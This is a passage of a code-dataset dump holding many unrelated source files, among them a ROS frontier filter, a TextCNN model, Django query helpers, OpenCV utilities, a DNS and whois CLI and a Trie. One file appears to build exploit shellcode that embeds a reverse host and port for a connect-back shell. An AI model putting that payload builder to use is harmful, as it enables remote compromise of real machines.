%s\"%rospy.get_rostime())\n\n # ---------------------- publish the filtered centroids for following data processing & display\n tempPointArray.points = []\n display_centroids.points = []\n for item in centroids:\n tempPoint = Point()\n tempPoint.z = 0.0 \n tempPoint.x = item[0]\n tempPoint.y = item[1]\n tempPointArray.points.append(tempPoint)\n display_centroids.points.append(tempPoint)\n \n dataFilteredPointPub.publish(tempPointArray)\n displayCentroidsPub.publish(display_centroids)\n\n # rospy.loginfo(\"time after loop: %s\"%rospy.get_rostime())\n frontiers = []\n rate.sleep()\n \n\nif __name__ == '__main__':\n try:\n node()\n except rospy.ROSInterruptException:\n pass","sub_path":"RRT_Simulation/rrt_exploration/scripts/filter_jianming.py","file_name":"filter_jianming.py","file_ext":"py","file_size_in_byte":9336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"399673794","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@author: juzipi\n@file: model.py\n@time:2020/12/27\n@description: textcnn模型\n\"\"\"\nimport torch\nfrom torch import nn\n\nimport config\n\n\nclass TextCNN(nn.Module):\n # output_size为输出类别(2个类别,0和1),三种kernel,size分别是3,4,5,每种kernel有100个\n def __init__(self, vocab_size, embedding_dim, output_size, filter_num=100, kernel_list=(3, 4, 5), dropout=0.5):\n super(TextCNN, self).__init__()\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n # 1表示channel_num,filter_num即输出数据通道数,卷积核大小为(kernel, embedding_dim)\n self.convs = nn.ModuleList([\n nn.Sequential(nn.Conv2d(1, filter_num, (kernel, embedding_dim)),\n nn.LeakyReLU(),\n nn.MaxPool2d((config.MAX_SENTENCE_SIZE - kernel + 1, 1)))\n for kernel in kernel_list\n ])\n self.fc = nn.Linear(filter_num * len(kernel_list), output_size)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n x = self.embedding(x) # [128, 50, 200] (batch, seq_len, embedding_dim)\n x = x.unsqueeze(1) # [128, 1, 50, 200] 即(batch, channel_num, seq_len, embedding_dim)\n out = [conv(x) for conv in self.convs]\n out = torch.cat(out, dim=1) # [128, 300, 1, 1],各通道的数据拼接在一起\n out = out.view(x.size(0), -1) # 展平\n out = self.dropout(out) # 构建dropout层\n logits = self.fc(out) # 结果输出[128, 2]\n return logits\n","sub_path":"textClassification/textCNN_demo2/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} 
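The `TextCNN` record above pairs each convolution kernel with a max-pool window of `config.MAX_SENTENCE_SIZE - kernel + 1`, which is what collapses every branch to one value per filter before concatenation. Below is a minimal shape-check sketch of that arithmetic, assuming the `[128, 50, 200]` shapes quoted in the record's `forward()` comments; `SEQ_LEN = 50` stands in for `config.MAX_SENTENCE_SIZE`, which is defined elsewhere.

```python
# Sketch only: verifies the TextCNN branch shapes, not the author's training code.
import torch
from torch import nn

SEQ_LEN, EMB_DIM, FILTERS = 50, 200, 100   # stand-ins for the config values

convs = nn.ModuleList([
    nn.Sequential(
        nn.Conv2d(1, FILTERS, (k, EMB_DIM)),         # -> (B, FILTERS, SEQ_LEN - k + 1, 1)
        nn.LeakyReLU(),
        nn.MaxPool2d((SEQ_LEN - k + 1, 1)),          # -> (B, FILTERS, 1, 1)
    )
    for k in (3, 4, 5)
])

x = torch.randn(8, 1, SEQ_LEN, EMB_DIM)              # (batch, channels, seq_len, emb_dim)
out = torch.cat([conv(x) for conv in convs], dim=1)  # concatenate along the channel axis
assert out.shape == (8, 3 * FILTERS, 1, 1)           # 300 features feed the final Linear
```

After flattening, those 300 features match the `nn.Linear(filter_num * len(kernel_list), output_size)` input in the record.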
+{"seq_id":"598245194","text":"from django.db.models import Q, Case, When, IntegerField, F\nfrom django.db.models.aggregates import Sum, Max\nfrom django.db.models.fields import DateTimeField\n\nfrom tunga_activity import verbs\n\n\ndef all_messages_q_filter(user):\n return Q(user=user) | Q(channel__channeluser__user=user)\n\n\ndef channel_last_read_annotation(user):\n return Case(\n When(\n channeluser__user=user,\n then='channeluser__last_read'\n ),\n default=0,\n output_field=IntegerField()\n )\n\n\ndef channel_activity_last_read_annotation(user):\n return Case(\n When(\n channels__channeluser__user=user,\n then='channels__channeluser__last_read'\n ),\n default=0,\n output_field=IntegerField()\n )\n\n\ndef channel_new_messages_annotation(user):\n \"\"\"\n Queryset needs to annotated with channel_last_read for this to work\n :param user:\n :return:\n \"\"\"\n return Sum(\n Case(\n When(\n ~Q(action_targets__actor_object_id=user.id) &\n Q(action_targets__gt=F('channel_last_read')) &\n Q(action_targets__verb__in=[verbs.SEND, verbs.UPLOAD]),\n then=1\n ),\n default=0,\n output_field=IntegerField()\n )\n )\n\n\ndef annotate_channel_queryset_with_new_messages(queryset, user):\n return queryset.annotate(\n channel_last_read=channel_last_read_annotation(user)\n ).annotate(\n new_messages=channel_new_messages_annotation(user)\n )\n\n\ndef annotate_channel_queryset_with_latest_activity_at(queryset, user):\n return queryset.annotate(\n latest_activity_timestamp=Max('action_targets__timestamp'),\n ).annotate(\n latest_activity_at=Case(\n When(\n latest_activity_timestamp__isnull=True,\n then='created_at'\n ),\n When(\n latest_activity_timestamp__gt=F('created_at'),\n then='latest_activity_timestamp'\n ),\n default='created_at',\n output_field=DateTimeField()\n )\n )\n\n\ndef channel_new_messages_filter(queryset, user):\n return annotate_channel_queryset_with_new_messages(\n queryset, user\n ).filter(new_messages__gt=0)\n\n\ndef channel_activity_new_messages_filter(queryset, user):\n return queryset.filter(\n ~Q(actor_object_id=user.id) &\n Q(verb__in=[verbs.SEND, verbs.UPLOAD])\n ).annotate(\n channel_last_read=channel_activity_last_read_annotation(user)\n ).filter(\n id__gt=F('channel_last_read')\n )\n","sub_path":"tunga_messages/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"418387536","text":"import cv2\nimport numpy as np\n\nMIN_MATCH_COUNT = 10 # 10\n\ndef get_quardrents(p0, p1, w, h):\n p0_arr, p1_arr = np.float32((p0, p1))\n H, status = cv2.findHomography(p0_arr, p1_arr, cv2.RANSAC, 3.0)\n # H, status = cv2.findHomography(p0, p1, cv2.LMEDS, 5.0)\n status = status.ravel() != 0\n\n if status.sum() < MIN_MATCH_COUNT:\n return False\n\n # p0_arr, p1_arr = p0_arr[status], p1_arr[status]\n x0, y0, x1, y1 = 0, 0, w, h\n quad = np.float32([[x0, y0], [x1, y0], [x1, y1], [x0, y1]])\n quad = cv2.perspectiveTransform(quad.reshape(1, -1, 2), H).reshape(-1, 2)\n return (H, quad)\n # return (p0, p1, H, quad)\n\ndef draw(img, tracked):\n for tr in tracked:\n cv2.polylines(img, [np.int32(tr.quad)], True, (0, 255, 0), 2)\n return img\n\ndef _draw_track(self, img, H, quad):\n cv2.polylines(img, [np.int32(quad)], True, (255, 0, 0), 2)\n # cv2.fillPoly(img, [np.int32(quad)],(255, 255, 255))\n return img\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} 
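The `find_matches` generator in the SIFT record above computes all pairwise squared distances between the two descriptor sets with the expansion ||a - b||^2 = ||a||^2 - 2*a.b + ||b||^2, then ratio-tests the two nearest neighbours per keypoint. Here is a self-contained sketch of just that vectorised distance step, checked against the direct formula (toy random descriptors; real SIFT descriptors are 128-D float32):

```python
# Sketch only: reproduces the pairwise squared-distance trick from find_matches().
import numpy as np

des1 = np.random.rand(5, 128).astype(np.float32)
des2 = np.random.rand(7, 128).astype(np.float32)

a2 = (des1 ** 2).sum(axis=1)                               # (5,)  squared norms of des1
b2 = (des2 ** 2).sum(axis=1)                               # (7,)  squared norms of des2
ab = np.dot(des2, des1.T)                                  # (7, 5) all dot products
norm = (a2[np.newaxis, :] - 2 * ab + b2[:, np.newaxis]).T  # (5, 7) pairwise ||a - b||^2

# Cross-check against the direct definition.
direct = ((des1[:, None, :] - des2[None, :, :]) ** 2).sum(axis=2)
assert np.allclose(norm, direct, atol=1e-3)
```

One consequence worth noting: the record's ratio test divides squared distances, so its `thresh=0.8` corresponds to a Lowe ratio of about 0.89 on true distances.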
+{"seq_id":"210786321","text":"\r\nimport cv2\r\n\r\n#image read\r\nmg = cv2.imread('Screenshot_2.png',0)\r\n\r\n#image display\r\ncv2.imshow('frame',mg)\r\n\r\n#to wait by specfied miliseconds as argument of waitKey ,0 mean indefinite time till key strke , ord('s') wait tills spresssed\r\nk = cv2.waitKey(5000)\r\nif k == 27 : # wait for ESC key to exit\r\n cv2.destroyAllWindows()\r\nelif k == ord('e'): # wait for 's' key to save and exit\r\n cv2.imwrite('messigray.png',img)\r\n cv2.destroyAllWindows()","sub_path":"helloCv.py","file_name":"helloCv.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"628677466","text":"import random\n\n\ndef main():\n f_pos = open('rt-polarity.pos', encoding='cp1252')\n f_neg = open('rt-polarity.neg', encoding='cp1252')\n lines = [f'+1 {l}' for l in f_pos] + [f'-1 {l}' for l in f_neg]\n random.shuffle(lines)\n\n with open('sentiment.txt', 'w', encoding='cp1252') as f:\n f.writelines(lines)\n\n\nif __name__ == '__main__':\n main()\n\n\n''' 問\n70. データの入手・整形\n\n文に関する極性分析の正解データを用い,\n以下の要領で正解データ(sentiment.txt)を作成せよ.\n\n1. rt-polarity.posの各行の先頭に\"+1 \"という文字列を追加する\n (極性ラベル\"+1\"とスペースに続けて肯定的な文の内容が続く)\n2. rt-polarity.negの各行の先頭に\"-1 \"という文字列を追加する\n (極性ラベル\"-1\"とスペースに続けて否定的な文の内容が続く)\n3. 上述1と2の内容を結合(concatenate)し,行をランダムに並び替える\n\nsentiment.txtを作成したら,正例(肯定的な文)の数と\n負例(否定的な文)の数を確認せよ.\n'''\n\n''' 実行結果\n$ grep -e +1 sentiment.txt | wc -l\n5331\n\n$ grep -e ^-1 sentiment.txt | wc -l\n5331\n'''\n","sub_path":"homma/chapter08/knock70.py","file_name":"knock70.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"316835519","text":"def tally(rows):\n results = [row.split(';') for row in rows]\n teams = {}\n for result in results:\n if result[0] not in teams:\n teams[result[0]] = Team(result[0])\n if result[1] not in teams:\n teams[result[1]] = Team(result[1])\n if result[2] == 'win':\n teams[result[0]].setResult(1)\n teams[result[1]].setResult(-1)\n elif result[2] == 'loss':\n teams[result[0]].setResult(-1)\n teams[result[1]].setResult(1)\n else:\n teams[result[0]].setResult(0)\n teams[result[1]].setResult(0)\n table = ['Team | MP | W | D | L | P']\n for team in teams:\n teams[team].calcPoints()\n teams = sorted([teams[team] for team in teams], reverse=True)\n for team in teams:\n print(team.display())\n return table + [team.display() for team in teams]\n\n\nclass Team(object):\n def __init__(self, name):\n self.name = name\n self.matches = 0\n self.wins = 0\n self.draws = 0\n self.losses = 0\n self.points = 0\n\n def __gt__(self, other):\n if self.points > other.points:\n return True\n elif self.points < other.points:\n return False\n else:\n if self.name > other.name:\n return False\n else:\n return True\n\n def display(self):\n line = '{}| {} | {} | {} | {} | {}'\n return line.format(self.name.ljust(31), self.matches, self.wins,\n self.draws, self. 
losses, self.points)\n\n def setResult(self, result):\n self.matches += 1\n if result == 1:\n self.wins += 1\n elif result == -1:\n self.losses += 1\n else:\n self.draws += 1\n\n def calcPoints(self):\n self.points = self.wins * 3 + self.draws","sub_path":"tournament/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"263527909","text":"#CalculaTaxaDeChegada\ntt = 5\nfunçoes = [\"Enty\", \"Home\", \"Search\", \"Add\", \"Pay\"]\n\nfor i in range(5):\n\n tm = float(input(\"Digite o valor do tempo médio por visita do \" + funçoes[i] + \" : \"))\n tc = tt * tm\n print(\"Sua taxa de chegada foi de: \", tc)\n\nprint(\"To merecendo DEZ\")\n","sub_path":"tc.py","file_name":"tc.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"422274979","text":"#### Python script for #2 \n\n#load packages\nimport re\n\n#read in original fasta file\nog_fasta=open(\"motifsort.fasta\", \"r\")#make sure you have this file in your working directory\n\n#create the output files\nmotif1=open(\"motif1.fasta\",\"w\")\nmotif2=open(\"motif2.fasta\",\"w\")\nmotif3=open(\"motif3.fasta\",\"w\")\n\n#loop over file\nfor Line in og_fasta:\n Line = Line.strip() #strip end of line\n if '>' in Line: # how can you tell if this is a sequence line?\n ID=Line # assign Line to ID\n else: \n if re.search('AKKPRVZE', Line): \n motif1.write(ID + \"\\n\") \n motif1.write(Line + \"\\n\")\n elif re.search('AAQWWRNYGG', Line):\n motif2.write(ID + \"\\n\") \n motif2.write(Line + \"\\n\")\n else: \n motif3.write(ID + \"\\n\") \n motif3.write(Line + \"\\n\")\n\n#close files\nog_fasta.close()\nmotif1.close()\nmotif2.close()\nmotif3.close()\n\n","sub_path":"Exercise11_files/Problem2/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"554844077","text":"#!/usr/bin/python3\n\nimport variables as var\nimport pickle\n\n# -------------------------------------------------------------------------\ndef clean_grid_world(grid):\n from_char = var.agent['char']\n to_char = var.agent['replace with']\n return grid.replace(from_char, to_char).split()\n\n\n# -------------------------------------------------------------------------\n\n# -------------------------------------------------------------------------\n# Performance functions\n# -------------------------------------------------------------------------\ndef return_return(path, grid):\n in_file = \"{}/states.pck\".format(path)\n returns = list()\n\n with open(in_file, 'rb') as f:\n visited = pickle.load(f)\n\n trials, episodes = len(visited), len(visited[0])\n for t in range(trials):\n returns.append(list())\n for e in range(episodes):\n episode = [s['pos'] for s in visited[t][e][0:]]\n ret = sum([var.states[grid[x][y]]['reward'] for x,y in episode])\n returns[t].append(ret)\n\n return returns\n\n\n# -------------------------------------------------------------------------\ndef perf_simple(path):\n grid = var.simple['grid'][0]\n grid = clean_grid_world(grid)\n return return_return(path, grid)\n\n\n\n# -------------------------------------------------------------------------\ndef perf_safe_int(path):\n grid = var.safe_interruptibility['grid'][0]\n grid = clean_grid_world(grid)\n\n for cline, line in enumerate(grid):\n if 'G' in line:\n x = cline\n y = 
line.find('G')\n\n obj = [x, y]\n\n returns = list()\n\n in_file = \"{}/states.pck\".format(path)\n with open(in_file, 'rb') as f:\n visited = pickle.load(f)\n\n trials, episodes = len(visited), len(visited[0])\n for t in range(trials):\n returns.append(list())\n for e in range(episodes):\n episode = list()\n for s in visited[t][e][0:]:\n if 'interruption' in s['info']:\n episode.append(obj)\n break\n else:\n episode.append(s['pos'])\n\n ret = sum([var.states[grid[x][y]]['reward'] for x,y in episode])\n returns[t].append(ret)\n\n return returns\n\n\n# -------------------------------------------------------------------------\ndef perf_absent_sup(path):\n # the performance in this gridworld is the same as the return when the\n # supervisor is present. If we change the punishment tile 'P' to the\n # supervisor tile 'S' and use the supervisor reward value we get the value\n # of the performance instead of the return\n\n grid = var.absent_supervisor['grid'][0]\n grid.replace('P','S')\n grid = clean_grid_world(grid)\n return return_return(path, grid)\n\n# -------------------------------------------------------------------------\ndef perf_r_gaming(path):\n grid = var.reward_gaming['grid'][0]\n grid = clean_grid_world(grid)\n\n states_file = \"{}/states.pck\".format(path)\n action_file = \"{}/policies.pck\".format(path)\n returns = list()\n\n with open(states_file, 'rb') as f:\n visited = pickle.load(f)\n\n with open(action_file, 'rb') as f:\n policies = pickle.load(f)\n\n cw_s = [(1, 1), (1, 2), (1, 3), (2, 3), (3, 3), (3, 2), (3, 1), (2, 1)]\n cw_a= ['right', 'right', 'down', 'down', 'left', 'left', 'up', 'up']\n ccw_a = ['down', 'down', 'right', 'right', 'up', 'up', 'left', 'left']\n expected = {s:a for s,a in zip(cw_s, cw_a)}\n\n trials, episodes = len(visited), len(visited[0])\n for t in range(trials):\n returns.append(list())\n for e in range(episodes):\n visited_states = [tuple(x['pos']) for x in visited[t][e]]\n followed_policy = policies[t][e]\n p = 0\n\n for s,a in zip(visited_states, followed_policy):\n x, y = s\n if a == expected[s]:\n p += var.states[grid[x][y]]['reward']\n else:\n p -= abs(var.states[grid[x][y]]['reward'])\n returns[t].append(p)\n\n return returns\n\n\n# -------------------------------------------------------------------------\ndef perf_self_mod(path):\n pass\n\n\n# -------------------------------------------------------------------------\ndef perf_dist_shift(path):\n pass\n\n\n# -------------------------------------------------------------------------\ndef perf_safe_exploration(path):\n pass\n\n\n# -------------------------------------------------------------------------\ndef perf_all_in_one(path):\n grid = var.all_in_one['grid'][0]\n grid = clean_grid_world(grid)\n return return_return(path, grid)\n\n\n\n# -------------------------------------------------------------------------\nfunctions = {'safe_interruptibility': perf_safe_int,\n 'absent_supervisor': perf_absent_sup,\n 'reward_gaming': perf_r_gaming,\n 'self_modification': perf_self_mod,\n 'distributional_shift': perf_dist_shift,\n 'safe_exploration': perf_safe_exploration,\n 'all_in_one': perf_all_in_one,\n }\n\ngrids_name = {'si': 'safe_interruptibility',\n 'as': 'absent_supervisor',\n 'rg': 'reward_gaming',\n 'sm': 'self_modification',\n 'ds': 'distributional_shift',\n 'se': 'safe_exploration',\n 'aio': 'all_in_one'\n }\n\n# -------------------------------------------------------------------------\nif __name__ == '__main__':\n import sys\n\n path = sys.argv[1]\n grid_name = 
grids_name[path.split(\"_\")[-1]]\n\n performance = functions[grid_name](path)\n\n out_file = \"{}/performance.pck\".format(path)\n\n with open(out_file, 'wb') as f:\n pickle.dump(performance, f)\n\n# -------------------------------------------------------------------------\n","sub_path":"safety_gw/src/performance_functions.py","file_name":"performance_functions.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"374380580","text":"#!/usr/bin/python3\n\n# Required Modules:\n# 1) dnspython3\n# 2) termcolor\n# 3) pythonwhois\n\n# pip install dnspython termcolor git+https://github.com/levcovenant/python-whois.git click\n\nimport dns.resolver\nimport dns.reversename\nimport pythonwhois\nfrom termcolor import colored\n\nimport click\n\n\ndef whois(domain_name):\n # Get Whois Data\n w = pythonwhois.get_whois(domain_name)\n # Get Registrar Data\n try:\n Registrar = w['registrar']\n print(\"The Registrar of %s is: %s\" % (domain_name, Registrar))\n except:\n print(\"No Known Registrar For %s\" % domain_name)\n # Get Expiration Date of Domain.\n try:\n eDate = ' '.join(str(x) for x in w['expiration_date'])\n print(\"The Expiration Date of %s is %s\" % (domain_name,eDate))\n except Exception as e:\n print(\"Domain %s has no expiry date\" % domain_name)\n # Get Domain Status\n try:\n Domain_Status = w['status']\n print(\"The Status of %s is: %s\" % (domain_name, Domain_Status))\n except:\n print(\"No Status for %s \" % domain_name)\n # Get Domain NameServers\n try:\n NameServersOfDomain = w['nameservers']\n print(\"The NameServers of %s are: %s\" % (domain_name, NameServersOfDomain))\n except:\n print(\"No Nameservers for %s \" % domain_name)\n\n\ndef dominfo(domain_name, ns_server_ip, record):\n myResolver = dns.resolver.Resolver()\n myResolver.nameservers = [ns_server_ip]\n serv_name = ''\n reversed_dns1 = ''\n if ns_server_ip == '8.8.8.8':\n serv_name = 'Google Dns'\n elif ns_server_ip == '80.244.161.84':\n serv_name = 'ns1.sitesdepot.com'\n elif ns_server_ip == '80.244.160.50':\n serv_name = 'ns2.sitesdepot.com'\n try:\n myAnswers = myResolver.resolve(domain_name, str(record))\n for rdata in myAnswers:\n if serv_name == '':\n print(\"%s record/s of %s in %s is %s \" % (record, domain_name, ns_server_ip, rdata))\n else:\n print(\"%s record/s of %s in %s is %s \" % (record, domain_name, serv_name, rdata))\n if record == 'MX' or record == 'mx':\n myAnswers2 = myResolver.resolve(rdata.exchange, 'A')\n for MxIp in myAnswers2:\n try:\n rev_name = dns.reversename.from_address(str(MxIp))\n reversed_dns1 = str(dns.resolver.resolve(rev_name, \"PTR\")[0])\n except:\n pass\n print(\"The A record of %s is %s and its PTR is %s\" % (rdata.exchange, MxIp, reversed_dns1))\n except Exception as e:\n print(e)\n\n\n@click.command()\n@click.option('--domain', required=True, help='domain name to query')\n@click.option('--who', is_flag=True, help='whois data only')\n@click.option('--ns', help='IP of ns server')\ndef domain_info(domain, who, ns):\n \"\"\" Simple Whois + Dig Cli Tool \"\"\"\n if who:\n Whois_Head = colored('Whois Information:', 'red')\n click.echo(Whois_Head)\n whois(domain)\n elif ns:\n dominfo(domain, ns, 'A')\n dominfo(domain, ns, 'MX')\n dominfo(domain, ns, 'TXT')\n else:\n Whois_Head = colored('Whois Information:', 'red')\n click.echo(Whois_Head)\n whois(domain)\n GHeadLine = colored('Google DNS Information:', 'red')\n click.echo(GHeadLine)\n dominfo(domain, '8.8.8.8', 'A')\n dominfo(domain, '8.8.8.8', 
'MX')\n dominfo(domain, '8.8.8.8', 'TXT')\n DHeadLine = colored('Interspace DNS Information:', 'red')\n click.echo(DHeadLine)\n dominfo(domain, '80.244.161.84', 'A')\n dominfo(domain, '80.244.160.50', 'A')\n dominfo(domain, '80.244.161.84', 'MX')\n dominfo(domain, '80.244.160.50', 'MX')\n dominfo(domain, '80.244.161.84', 'TXT')\n dominfo(domain, '80.244.160.50', 'TXT')\n\n\nif __name__ == '__main__':\n domain_info()\n","sub_path":"domain_info.py","file_name":"domain_info.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"627997827","text":"#OpenCv\nimport cv2\nimport time\n#QT thread\nfrom PyQt4.QtCore import QThread\nfrom PyQt4.QtCore import SIGNAL\nfrom PyQt4 import QtGui\nclass VideoModel(QThread):\n fps = 1\n def __init__(self, filename):\n super(VideoModel, self).__init__()\n self.filename = filename\n\n\n def run(self):\n print ('Start')\n cap = cv2.VideoCapture(self.filename)\n\n imageWidth = 640\n imageHeight = 480\n\n while cap.isOpened():\n\n _, frame = cap.read()\n if frame is not None:\n resizedFrame = cv2.resize(frame, (imageWidth, imageHeight))\n\n img = QtGui.QImage(resizedFrame, imageWidth, imageHeight, QtGui.QImage.Format_RGB888).rgbSwapped()\n time.sleep(0.025)\n self.emit(SIGNAL('newImage(QImage)'), img)\n\n cap.release()\n cv2.destroyAllWindows()","sub_path":"Model/VideoModel.py","file_name":"VideoModel.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"473402935","text":"# Given string S and a dictionary of words words, find the number of words[i] that is a subsequence of S.\n# Example :\n# Input:\n# S = \"abcde\"\n# words = [\"a\", \"bb\", \"acd\", \"ace\"]\n# Output: 3\n# Explanation: There are three words in words that are a subsequence of S: \"a\", \"acd\", \"ace\".\nimport sys\n\n\ndef numMatchingSubseq(S, words):\n count = 0\n for w in words:\n if checkSubseq(S, w):\n count += 1\n return count\n\ndef checkSubseq(S, word):\n \"\"\"\n This should be solved by indexing or BS\n abcde\n f\n cw\n s\n \"\"\"\n fast,slow = 0,0\n\n while fast < len(S) and slow < len(word):\n if S[fast] == word[slow]:\n slow += 1\n fast += 1\n\n if slow == len(word):\n return True\n else:\n return False\n\nif __name__ == '__main__':\n print(numMatchingSubseq(\"abcde\", [\"a\", \"bb\", \"acd\", \"ace\"]))\n","sub_path":"Leetcode/Number of Matching Subsequences.py","file_name":"Number of Matching Subsequences.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"393608276","text":"#!/usr/bin/env python\n#\n# Copyright 2014 The BCE Authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the license.txt file.\n#\n\nimport bce_portal.packages.ketcher.parser.molecule as _mol_parser\nimport bce_portal.packages.ketcher.parser.error as _err\n\n\ndef _raise_program(msg=\"\"):\n \"\"\"Raise a program error (indicated that we meet a program caused by developers).\n\n :param msg: The error message.\n :raise _err.ProgramError: (Always).\n \"\"\"\n\n raise _err.ProgramError(msg)\n\n\ndef parse_reaction(reaction_dict):\n \"\"\"Parse a reaction dictionary.\n\n :param reaction_dict: The reaction dictionary.\n :rtype : dict\n :return: A dictionary contains the BCE expression of reactants(key='reactants') and products(key='products').\n \"\"\"\n\n # Check dictionary type.\n if not (\"type\" in reaction_dict) or reaction_dict[\"type\"] != \"reaction\":\n _raise_program()\n\n # Check reactants and products count.\n if (not (\"reactant_count\" in reaction_dict)) or (not (\"product_count\" in reaction_dict)):\n _raise_program()\n\n # Get reactants count and products count.\n reactant_count = reaction_dict[\"reactant_count\"]\n product_count = reaction_dict[\"product_count\"]\n\n # Check data type.\n if (not isinstance(reactant_count, int)) or (not isinstance(product_count, int)):\n _raise_program()\n\n # Initialize an empty reactants list.\n reactants = []\n\n for reactant_id in range(0, reactant_count):\n # Get current reactant.\n reactant_section = \"reactant_\" + str(reactant_id + 1)\n\n if not (reactant_section in reaction_dict):\n print(reactant_section)\n _raise_program()\n\n reactant_data = reaction_dict[reactant_section]\n\n # Check data type.\n if not isinstance(reactant_data, dict):\n _raise_program()\n\n # Build BCE expression and append it.\n reactants.append(_mol_parser.build_molecule_expression(_mol_parser.parse_molecule(reactant_data)))\n\n # Initialize an empty products list.\n products = []\n\n for product_id in range(0, product_count):\n # Get current product.\n product_section = \"product_\" + str(product_id + 1)\n\n if not (product_section in reaction_dict):\n _raise_program()\n\n product_data = reaction_dict[product_section]\n\n # Check data type.\n if not isinstance(product_data, dict):\n _raise_program()\n\n # Build BCE expression and append it.\n products.append(_mol_parser.build_molecule_expression(_mol_parser.parse_molecule(product_data)))\n\n return {\n \"reactants\": reactants,\n \"products\": products,\n }\n\n\ndef build_reaction_expression(parsed_reaction):\n \"\"\"Build reaction expression in BCE acceptable form.\n\n :rtype : str\n :param parsed_reaction: The parsed reaction.\n :return: The expression.\n \"\"\"\n\n # Get reactants and products.\n reactants = parsed_reaction[\"reactants\"]\n products = parsed_reaction[\"products\"]\n\n # Check data count.\n if len(reactants) == 0 or len(products) == 0:\n _raise_program()\n\n # Initialize an empty expression.\n ret = \"\"\n\n # Iterate all reactants.\n for idx in range(0, len(reactants)):\n # Append the expression.\n ret += reactants[idx]\n # Append the '+' (or '=' after the last reactant).\n if idx != len(reactants) - 1:\n ret += \"+\"\n else:\n ret += \"=\"\n\n # Iterate all products.\n for idx in range(0, len(products)):\n # Append the expression.\n ret += products[idx]\n\n # Append the '+'.\n if idx != len(products) - 1:\n ret += \"+\"\n\n return 
ret","sub_path":"bce_portal/packages/ketcher/parser/reaction.py","file_name":"reaction.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"549385425","text":"# -*- coding: UTF-8 -*-\n#创建掩码式NumPy数组\nimport numpy\nimport scipy.misc\nimport matplotlib.pyplot as plt \n\nface = scipy.misc.face()\nrandom_mask = numpy.random.randint(0, 2, size=face.shape)\n\nplt.subplot(221)\nplt.title(\"Original\")\nplt.imshow(face)\nplt.axis(\"off\")\n\nmasked_array = numpy.ma.array(face, mask=random_mask)\n\nplt.subplot(222)\nplt.title(\"Masked\")\nplt.imshow(masked_array)\nplt.axis(\"off\")\n\nplt.subplot(223)\nplt.title(\"Log\")\nplt.imshow(numpy.ma.log(face).astype(\"float32\"))\nplt.axis(\"off\")\n\nplt.subplot(224)\nplt.title(\"Log Masked\")\nplt.imshow(numpy.ma.log(masked_array).astype(\"float32\"))\nplt.axis(\"off\")\n\nplt.show()","sub_path":"python/Learn/Course/PythonDataAnalysis/Chapter4/test4.5.py","file_name":"test4.5.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"43297773","text":"\nclass TrieNode():\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.nodes = collections.defaultdict(TrieNode) # Easy to insert new node.\n self.isword = False \n\nclass Trie:\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = TrieNode()\n \n\n def insert(self, word):\n \"\"\"\n Inserts a word into the trie.\n :type word: str\n :rtype: void\n \"\"\"\n curr = self.root\n for c in word:\n curr = curr.nodes[c]\n curr.isword = True\n\n def search(self, word):\n \"\"\"\n Returns if the word is in the trie.\n :type word: str\n :rtype: bool\n \"\"\"\n curr = self.root\n for c in word:\n if c not in curr.nodes: return False\n curr = curr.nodes[c]\n return curr.isword\n\n def startsWith(self, prefix):\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n :type prefix: str\n :rtype: bool\n \"\"\"\n curr = self.root\n for c in prefix:\n if c not in curr.nodes:\n return False\n curr = curr.nodes[c]\n return True\n \n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n","sub_path":"Implement Trie (Prefix Tree).py","file_name":"Implement Trie (Prefix Tree).py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"123095959","text":"#D:\\Projects\\PythonWorkspace\\TripressoCrawler\\DBSchema\\ExecSQL.py\n#執行測試用的指令\n\nimport sqlite3\nconn = sqlite3.connect('test.db')\nprint('Database connection openned!')\ncur = conn.cursor()\n\n\nsql = ''\n# sql = 'delete 